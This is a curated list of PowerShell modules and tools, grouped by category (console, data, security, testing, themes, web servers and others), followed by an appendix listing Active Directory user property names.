  • PSReadLine - Bash inspired readline implementation for PowerShell. Keeps history between sessions, adds reverse-history search and makes the commandline experience much better overall.
  • TabExpansionPlusPlus - PowerShell module to make customizing tab completion easier and add a library of custom argument completers.
  • Jump-Location - PowerShell cd that reads your mind. Autojump implementation for PowerShell. UNMAINTAINED
  • Zlocation * z.sh implementation for PowerShell. Similar to Jump-Location.
  • thefuck - Magnificent app which corrects your previous console command (by typing fuck).
  • pslinq - LINQ (LINQ2Objects) for PowerShell.
  • posh-with - Command prefixing for continuous workflow using a single tool.
  • poco* peco implementation. Interactive filtering tool.
  • PSDirTag - DirTags are relative paths that appear as variables in the PowerShell prompt that update as you navigate. Saves keystrokes when navigating folder structures.
  • PSUtil - Designed to make the user's console life more convenient. It includes shortcuts, aliases, key bindings and convenience functions geared towards greater efficiency and less typing.
  • Microsoft.PowerShell.UnixCompleters - Get parameter completion for native Unix utilities. Requires zsh or bash.
  • PSDepend - PowerShell Dependency Handler
  • PSScriptTools - A set of of PowerShell functions you might use to enhance your own functions and scripts or to facilitate working in the console.
  • zoxide - A better way to navigate your filesystem. Written in Rust, cross-shell, and much faster than other autojumpers.

Communities


Data

  • hjson-powershell - Simple powershell module for conversion between HJSON and JSON.
  • ImportExcel - Module to import/export Excel spreadsheets, without Excel.
  • powershell-yaml - PowerShell CmdLets for YAML format manipulation.
  • PSWriteHTML - PSWriteHTML is a PowerShell module allowing you to create HTML easily.
  • PSWritePDF - Module to create, edit, split, merge PDF files on Windows / Linux and MacOS.
  • PSWriteWord - Module to create Microsoft Word documents without Microsoft Word installed.

Documentation Helper

  • platyPS - Write PowerShell External Help in Markdown.
  • Invoke-CreateModuleHelpFile - PowerShell function to create a HTML help file for a module and all it's commands.
  • PScribo - PowerShell documentation framework what can create HTML, Word, text files based on PowerShell-based DSL (domain specific language).

Editors and IDEs


Frameworks

  • Carbon - DevOps for automating the configuration of Windows computers.
  • PowerShell PowerUp - Powerful server management framework.
  • PSCX - PowerShell Community Extensions - Useful set of additional cmdlets.
  • PSFramework - Easily add configurations, logging and more to your own PowerShell module.
  • Kansa - Incident response framework.

Interactive Learning

  • PSKoans - A simple, fun, and interactive way to learn the PowerShell language through Pester unit testing.
  • Jupyter-PowerShell - Jupyter Kernel for PowerShell.

Logging

  • PoShLog - Cross-platform, extensible logging module built upon Serilog.

Module Development Templates

  • Plaster - Plaster is a template-based file and project generator written in PowerShell.
  • PSModuleDevelopment - Get started using module templates in 2 minutes with this module's low entry barrier and casual convenience.
  • Catesta - Catesta is a PowerShell module project generator. It uses templates to rapidly scaffold test and build integration for a variety of CI/CD platforms.

Package Managers

  • PowerShellGet - PowerShellGet is the Package Manager for PowerShell. Packages are available on PowerShellGallery.
  • Chocolatey - The package manager for Windows. The sane way to manage software on Windows.
  • GitLab - Use a GitLab server as Package Provider.
  • Scoop - A command-line installer for Windows.
  • PowerShell App Deployment Toolkit - Provides a set of functions to perform common application deployment tasks and to interact with the user during a deployment.

Parallel Processing

  • PoshRSJob - Provides an alternative to PSJobs with greater performance and less overhead to run commands in the background.
  • Invoke-Parallel - This function will take in a script or scriptblock, and run it against specified objects(s) in parallel.
  • PSThreadJob - Module for running concurrent jobs based on threads rather than processes.

Podcasts


Security

  • File System Security - Allows a much easier management of permissions on files and folders.
  • PowerShellArsenal - Module used to aid a reverse engineer.
  • PowerTools - Collection of projects with a focus on offensive operations.
  • PowerForensics - Popular live disk forensics platform for windows.
  • PowerSploit - Post-exploitation framework.
  • PowerShellEmpire - Post-exploitation agent.
  • PSReflect - Easily define in-memory enums, structs, and Win32 functions in PowerShell. Useful for attacks, example.
  • BloodHound - Easily identify highly complex attack paths that would otherwise be impossible to quickly identify.
  • Nishang - Enables scripting for red team, penetration testing, and offensive security.
  • Harness - Interactive remote PowerShell Payload.
  • Invoke-Obfuscation - PowerShell Obfuscator.
  • p0wnedShell - PowerShell Runspace Post Exploitation Toolkit.
  • PESecurity - Module to check if a Windows binary (EXE/DLL) has been compiled with ASLR, DEP, SafeSEH, StrongNaming, and Authenticode.
  • Powershellery - Powershell scripts used for general hackery.
  • PowerUpSQL - Toolkit for Attacking SQL Server.

SharePoint

  • AutoSPInstaller - Automated SharePoint 2010-2019 installation script.
  • Client-side SharePoint - API for SharePoint 2010, 2013 and Online.
  • SPReplicator - SPReplicator helps replicate SharePoint list data to/from CSV, SQL Server, SharePoint itself and more.

SQL Server

  • dbatools - Helps SQL Server Pros be more productive with instance migrations and much more.
  • SimplySql - SimplySql is a module that provides an intuitive set of cmdlets for talking to databases that abstracts the vendor specifics. The basic pattern is to connect to a database, execute one or more sql.

Testing

  • Pester - PowerShell BDD style testing framework.
  • Format-Pester - PowerShell module for documenting Pester's results - exports Pester results to HTML, Word, text files using PScribo.
  • Selenium - PowerShell module to run a Selenium WebDriver.
  • PSScriptAnalyzer - PSScriptAnalyzer provides script analysis and checks for potential code defects in the scripts by applying a group of built-in or customized rules on the scripts being analyzed.

Themes

  • Oh-My-Posh - Tons of beautiful theme that can be enabled by one single command (includes many awesome powerline theme).
  • PoshColor - Colour output from common commands with support for custom themes.
  • Powerline - PowerShell Classes for richer output and prompts.
  • Starship - The minimal, blazing fast, and extremely customizable prompt for any shell.

UI

  • AnyBox - Designed to facilitate script input/output with an easily customizable WPF window.
  • BurntToast - Module for creating and displaying Toast Notifications on Microsoft Windows 10.
  • Graphical - Module to plot colorful console 2D Graphs (Scatter, Bar, Line).
  • GraphicalTools - A module that mixes PowerShell and GUIs! - built on Avalonia and gui.cs.
  • PS-Menu - Simple module to render interactive console menu.
  • PSWriteColor - Write-Color is a wrapper around Write-Host allowing you to create nice looking scripts, with colorized output.
  • Terminal-Icons - Module to show file and folder icons in the terminal.
  • psInlineProgress - Write inline progress bars in PowerShell.

Videos


Webserver

  • Flancy - Web microframework for Windows PowerShell.
  • Pode - Pode is a Cross-Platform PowerShell framework for creating web servers to host REST APIs, Web Sites, and TCP/SMTP Servers.
  • Polaris - A cross-platform, minimalist web framework for PowerShell.
  • WebCommander - Run scripts and view results, in a friendly web GUI or via a web service.
  • Universal Dashboard - Cross-platform module for developing websites and REST APIs.

Misc

  • DbgShell - A PowerShell front-end for the Windows debugger engine.
  • poke - Crazy cool reflection module for PowerShell. Explore and invoke private APIs like nobody is watching. Useful for security research, testing and quick hacks.
  • WSLab - Windows Server rapid lab deployment scripts.
  • PoshBot - Powershell-based bot framework.
  • PoShKeePass - Module for working with KeePass databases.

✍️ Authors


🎉 Acknowledgments

  • Hat tip to anyone whose code was used
  • Inspiration
  • References

Appendix A ADUser Property List

AccountExpirationDate
accountExpires
AccountLockoutTime
AccountNotDelegated
AllowReversiblePasswordEncryption
AuthenticationPolicy
AuthenticationPolicySilo
BadLogonCount
badPasswordTime
badPwdCount
c
CannotChangePassword
CanonicalName
Certificates
City
CN
codePage
Company
CompoundIdentitySupported
Country
countryCode
Created
createTimeStamp
Deleted
Department
departmentNumber
Description
DisplayName
DistinguishedName
Division
DoesNotRequirePreAuth
dSCorePropagationData
EmailAddress
EmployeeID
EmployeeNumber
employeeType
Enabled
extensionAttribute1
extensionAttribute10
extensionAttribute2
extensionAttribute3
extensionAttribute5
Fax
garbageCollPeriod
gidNumber
GivenName
HomeDirectory
HomedirRequired
HomeDrive
HomePage
HomePhone
Initials
instanceType
internetEncoding
isDeleted
KerberosEncryptionType
LastBadPasswordAttempt
LastKnownParent
lastLogoff
lastLogon
LastLogonDate
lastLogonTimestamp
legacyExchangeDN
LockedOut
lockoutTime
loginShell
logonCount
LogonWorkstations
mail
mailNickname
managedObjects
Manager
MemberOf
MNSLogonAccount
mobile
MobilePhone
Modified
modifyTimeStamp
msDS-AuthenticatedAtDC
msDS-ExternalDirectoryObjectId
msDS-SupportedEncryptionTypes
msDS-User-Account-Control-Computed
msExchAddressBookFlags
msExchArchiveGUID
msExchArchiveName
msExchArchiveQuota
msExchArchiveStatus
msExchArchiveWarnQuota
msExchBypassAudit
msExchCalendarLoggingQuota
msExchDumpsterQuota
msExchDumpsterWarningQuota
msExchGroupSecurityFlags
msExchMailboxAuditEnable
msExchMailboxAuditLogAgeLimit
msExchMDBRulesQuota
msExchModerationFlags
msExchPoliciesIncluded
msExchProvisioningFlags
msExchRecipientDisplayType
msExchRecipientSoftDeletedStatus
msExchRecipientTypeDetails
msExchRemoteRecipientType
msExchSafeSendersHash
msExchTransportRecipientSettingsFlags msExchUMDtmfMap
msExchUMEnabledFlags2
msExchUserAccountControl
msExchUserHoldPolicies
msExchVersion
msSFU30Name
msSFU30NisDomain
Name
nTSecurityDescriptor
ObjectCategory
ObjectClass
ObjectGUID
objectSid
Office
OfficePhone
Organization
OtherName
PasswordExpired
PasswordLastSet
PasswordNeverExpires
PasswordNotRequired
physicalDeliveryOfficeName
POBox
PostalCode
PrimaryGroup
primaryGroupID
PrincipalsAllowedToDelegateToAccount
ProfilePath
ProtectedFromAccidentalDeletion
protocolSettings
proxyAddresses
PSComputerName
PSShowComputerName
pwdLastSet
RunspaceId
SamAccountName
sAMAccountType
ScriptPath
sDRightsEffective
ServicePrincipalNames
showInAddressBook
SID
SIDHistory
SmartcardLogonRequired
sn
st
State
StreetAddress
Surname
targetAddress
textEncodedORAddress
Title
TrustedForDelegation
TrustedToAuthForDelegation
uid
uidNumber
unixHomeDirectory
UseDESKeyOnly
userAccountControl
UserPrincipalName
uSNChanged
uSNCreated
whenChanged
whenCreated